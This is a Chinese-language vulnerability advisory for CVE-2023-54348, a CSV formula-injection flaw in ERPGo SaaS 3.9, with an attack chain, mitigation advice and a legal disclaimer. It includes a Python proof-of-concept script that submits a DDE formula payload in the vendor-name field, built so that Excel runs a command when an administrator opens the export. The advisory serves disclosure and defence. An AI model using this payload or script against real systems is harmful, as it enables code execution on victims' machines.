IPBUF安全漏洞报告
English
CVE-2023-54348 CVSS 8.8 高危

CVE-2023-54348: ERPGo SaaS CSV注入漏洞

披露日期: 2026-05-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2023-54348
漏洞类型
CSV注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
ERPGo SaaS

相关标签

CSV注入ERPGo SaaS远程代码执行Formula InjectionDDE

漏洞概述

ERPGo SaaS 3.9版本存在严重的CSV注入漏洞。该漏洞源于系统未对导出功能中的用户输入进行严格的安全过滤。经过身份认证的攻击者可以在创建供应商的过程中,向供应商名称字段恶意植入Excel公式载荷。一旦受影响的CSV文件被导出并由管理员使用电子表格软件(如Microsoft Excel)打开,恶意公式将自动触发,最终导致攻击者在目标系统上执行任意代码,造成严重的安全风险。

技术细节

该漏洞属于典型的CSV注入(Formula Injection)漏洞。其根本原因在于ERPGo SaaS在处理供应商创建请求时,未对“供应商名称”等关键字段进行有效的输入消毒和输出转义。攻击者利用低权限账户登录系统后,可在创建供应商时,将恶意的Excel公式载荷(如`=10+20+cmd|' /C calc'!A0`)注入到名称字段中。系统随后将此数据直接写入CSV导出文件。当具有更高权限的管理员导出并使用电子表格软件(如Microsoft Excel)打开该CSV文件时,软件会自动解析以特定符号开头的字符串为公式。利用Excel的动态数据交换(DDE)机制,攻击者可构造特定的命令序列,诱导Excel执行系统命令(如启动计算器或下载木马)。由于攻击发生在客户端(管理员的电脑),这可能导致内网渗透或进一步的横向移动。

攻击链分析

STEP 1
步骤1:身份认证
攻击者使用低权限账户登录ERPGo SaaS系统。
STEP 2
步骤2:恶意注入
攻击者访问供应商创建页面,在“供应商名称”字段中输入恶意的Excel公式载荷(如=10+20+cmd|' /C calc'!A0)。
STEP 3
步骤3:数据存储
系统将包含恶意公式的数据未经过滤直接存储在数据库中。
STEP 4
步骤4:诱导导出
管理员或具有导出权限的用户导出供应商列表为CSV文件。
STEP 5
步骤5:触发漏洞
管理员使用Excel等电子表格软件打开CSV文件,软件解析公式并执行系统命令。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for creating a vendor target_url = "http://target-erp.com/vendors/create" # Attacker's session cookie (after authentication) cookies = { "session": "attacker_session_cookie_here" } # Payload: Malicious CSV formula using DDE to execute calc.exe # Payload explanation: =10+20+cmd|' /C calc'!A0 # This tricks Excel into executing 'cmd /C calc' via DDE payload_name = "=10+20+cmd|' /C calc'!A0" data = { "name": payload_name, "email": "[email protected]", "contact": "123456789" } try: response = requests.post(target_url, data=data, cookies=cookies) if response.status_code == 200: print("[+] Vendor created successfully with CSV injection payload.") print("[+] If an admin exports vendors to CSV and opens it in Excel, code execution will occur.") else: print("[-] Failed to create vendor.") except Exception as e: print(f"[-] Error: {e}")

影响范围

ERPGo SaaS 3.9

防御指南

临时缓解措施
在厂商发布修复补丁前,建议管理员不要直接使用Excel打开来源不可信的CSV文件,可使用记事本等纯文本编辑器先行查看。同时,建议在Excel中禁用动态数据交换(DDE)功能,以防止恶意公式自动执行。此外,应严格限制低权限用户创建供应商的权限。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表